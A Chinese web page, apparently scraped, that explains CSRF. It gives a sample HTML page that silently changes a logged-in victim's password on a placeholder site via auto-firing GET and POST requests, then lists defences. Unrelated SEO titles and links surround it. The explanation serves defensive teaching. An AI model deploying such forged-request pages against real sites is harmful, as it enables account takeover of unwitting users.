当前位置: 首页 > news >正文

西部数码网站管理助手 301医院网站 整站源码

西部数码网站管理助手 301,医院网站 整站源码,个人电脑 wordpress,邢台今时讯一、如何发起一次CSRF攻击 原理:CSRF 的本质实际上是利用了 Cookie 会自动在请求中携带的特性,通过伪造请求来执行恶意操作。 1、目标网站信息: 接口地址:https://victim.com/change-password 请求类型:get/post 接…

一、如何发起一次CSRF攻击

原理:CSRF 的本质实际上是利用了 Cookie 会自动在请求中携带的特性,通过伪造请求来执行恶意操作。

1、目标网站信息:

接口地址:https://victim.com/change-password
请求类型:get/post
接受参数:password

2、编写一个网页

<!DOCTYPE html>
<html><body><!-- GET类型的CSRF --><img src="https://victim.com/change-password?password=vme50"><!-- POST类型的CSRF --><form action="https://victim.com/change-password" method=POST><input type="hidden" name="password" value="vme50" /></form><script> document.forms[0].submit(); </script> </body>
</html>

3、诱导用户打开我们的网页

用户在已经登录了https://victim.com这个网站的情况下打开我们的网站,代码会自动发起网络请求,将受害者的账号密码修改为我们设置的值

二、防护策略

1、使用 CSRF Token(推荐):

在每个表单提交或敏感操作中包含一个随机生成的 CSRF Token,并将其与用户的会话关联起来。
服务器在接收到请求时验证 CSRF Token 的有效性,如果不匹配,则拒绝请求。
这样可以防止攻击者伪造请求,因为攻击者无法获取有效的 CSRF Token。

2、同源检测:

① 验证请求头:在服务器端验证请求头中的 Referer 字段或 Origin 字段,确保请求来自合法的源
② 验证域名:在服务器端对请求进行同源检测,只接受来自同一域名下的请求
③ 对在本域发起的攻击无效

3、设置 SameSite Cookie 属性:

将敏感的 Cookie 设置为 SameSite 属性为 Strict 或 Lax,限制其在跨站点请求中的发送,从而减少 CSRF 攻击的风险。

4、二次确认

① 验证码:对于敏感操作,可以要求用户输入验证码进行验证,以确保请求是由真实用户发起的

http://www.yayakq.cn/news/867426/

相关文章:

  • 中国黄金集团j建设公司网站广州微信网站建设平台
  • 网页设计 网站新闻摘抄
  • 网站制作网站模板wordpress4.7.4伪静态
  • 河南网站seo营销多少费用网站的建设时间表
  • 深圳宝安做网站阿里网站销量做不起来怎么办
  • 济南做兼职网站网站建设的职业叫什么
  • 行业展示类型网站大连建设项目
  • 不关站备案wordpress自己怎么制作公众号
  • 网站建设p2p企业网站对网络营销的意义
  • 做网站和APP需要注册公司吗网站建设目标怎么看
  • 惠阳网站建设公司十大免费域名
  • 域名和网站建站公司链接扁平图标网站
  • 微信公众平台对接网站用ps做班级网站
  • 网站如何更新内容网站建设公司muyunke
  • 镇江网站建设优化案例分析html菜鸟教程视频
  • 织梦网站栏目管理空白仿淘宝网站制作
  • 网站开发常用标签网站后台登陆路径
  • h5模板网站免费源码买卖网站
  • 门户网站有wordpress 抓取时间长
  • 网站开发设计开题报告房产网站推广方法
  • 上海网站高端WordPress主题会包含木马吗
  • 个人网站怎么命名青岛制作网站
  • 刷赞网站建设怎么做一个个人网页
  • 保定网站建设报价河北建设工程信息网官网入口
  • wordpress免费开放版网站做SEO优化多少钱
  • 外链推广网站都有哪些jeecg低代码开发平台
  • 信息技术制作网站首页做网站用哪个工具
  • 做游戏用什么电脑系统下载网站好木马文创的工业设计
  • 吉安网站设计八角网站建设
  • 大连企业制作网站电子商务网站建设侧重哪几个方面